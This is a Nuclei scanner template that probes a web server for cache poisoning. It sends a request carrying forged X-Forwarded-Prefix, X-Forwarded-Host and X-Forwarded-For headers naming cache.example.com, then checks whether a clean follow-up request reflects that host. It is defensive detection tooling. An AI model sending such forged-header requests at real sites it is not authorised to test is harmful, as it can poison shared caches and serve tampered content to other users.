nuclei-templates/vulnerabilities/generic/cache-poisoning.yaml

id: cache-poisoning

info:
  name: Cache Poisoning
  author: melbadry9,xelkomy
  severity: info
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
  tags: cache,generic

requests:
  - raw:
      - |
        GET /?mel=9 HTTP/1.1
        X-Forwarded-Prefix: cache.example.com
        X-Forwarded-Host: cache.example.com
        X-Forwarded-For: cache.example.com        

      - |
        GET /?mel=9 HTTP/1.1        

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.example.com")'